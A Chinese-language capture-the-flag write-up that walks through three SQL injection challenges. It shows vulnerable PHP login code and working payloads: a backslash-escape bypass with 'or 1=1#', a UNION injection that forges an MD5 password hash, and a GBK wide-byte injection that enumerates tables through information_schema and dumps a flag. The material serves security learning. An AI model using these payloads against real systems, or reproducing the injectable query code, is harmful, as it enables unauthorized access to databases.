【黑客笔记--7天入门南邮CTF-WEB篇】

SQL注入

查看页面源代码有下面的提示信息

先看clean函数做了什么 直接干掉了引号啊 \' ==> '

function clean($str){
	if(get_magic_quotes_gpc()){
		$str=stripslashes($str);
	}
	return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
	die('Invalid password!');
}

echo $flag;

分析一下SQL语句 一般来说注入的思路就是#截断SQL语句的password字段

'SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';'

展开看是下面这样的结构

SELECT * FROM users WHERE name=

\' $username \'

AND pass=

\' $password \';

看看代码 靠闭合' 的思路是行不通了 为什么呢?因为\'会被转义 思路就是如何打破\'的束缚 方案就是干掉username后面的\' 让一个AND结构变成OR 结构 结果如下

SELECT * FROM users WHERE name=

\' admin\ \'

AND pass=

\' or 1=1# \';

SQL注入第2题

提示考察union的用法 要求输入的user和pass要和数据库中的相同才算通过 靠猜是不可能的 那么直接通过POST请求体中输入的user打乱SQL语句吧

<?php
if($_POST[user] && $_POST[pass]) {
  mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>

首先我们拿到pass=hackbiji的md5也就是add0ca38fedfc9e173d676deeca7e0e7

root@gt:~/Codes# php 8.php 
add0ca38fedfc9e173d676deeca7e0e7
root@gt:~/Codes# cat 8.php
<?php
$pass = 'hackbiji';
echo md5($pass)."\n";
?>

原始SQL语句 "select pw from ctf where user='$user'"

输入

user = -1' union select 'add0ca38fedfc9e173d676deeca7e0e7'# 或者

-1' union select 'add0ca38fedfc9e173d676deeca7e0e7

pass = hackbiji

最终的效果如下

select pw from ctf where user=' -1' union select 'add0ca38fedfc9e173d676deeca7e0e7'

宽字节注入

SQL注入经常使用'闭合SQL语句 如下测试 我们发现'被转义成\' 我们需要吃掉\

在我的【前端黑客】XSS入门 文章中有介绍宽字节问题

爆破数据库名:

id=%ef%27%20union%20select%201,database()%23

your sql:select id,title from news where id = '颸' union select 1,database()#'

拿到结果:sae-chinalover 对应16进制:0x7361652d6368696e616c6f766572

爆破数据库sae-chinalover的所有表名:

id=%ef%27%20union%20select%20group_concat(table_name),group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7361652d6368696e616c6f766572%23

your sql:select id,title from news where id = '颸' union select group_concat(table_name),group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572#'

拿到结果:ctf,ctf2,ctf3,ctf4,news

对应的16进制:0x637466 0x63746632 0x63746633 0x63746634 0x6e657773

爆破表ctf4的所有列名:

id=%ef%27%20union%20select%20group_concat(column_name),group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x63746634%23

your sql:select id,title from news where id = '颸' union select group_concat(column_name),group_concat(column_name) from information_schema.columns where table_name=0x63746634#'

拿到结果:id,flag

爆破表ctf4的flag列的数据

id=%ef%27%20union%20select%20flag,flag%20from%20ctf4%23

your sql:select id,title from news where id = '颸' union select flag,flag from ctf4#'

拿到结果:nctf{gbk_3sqli}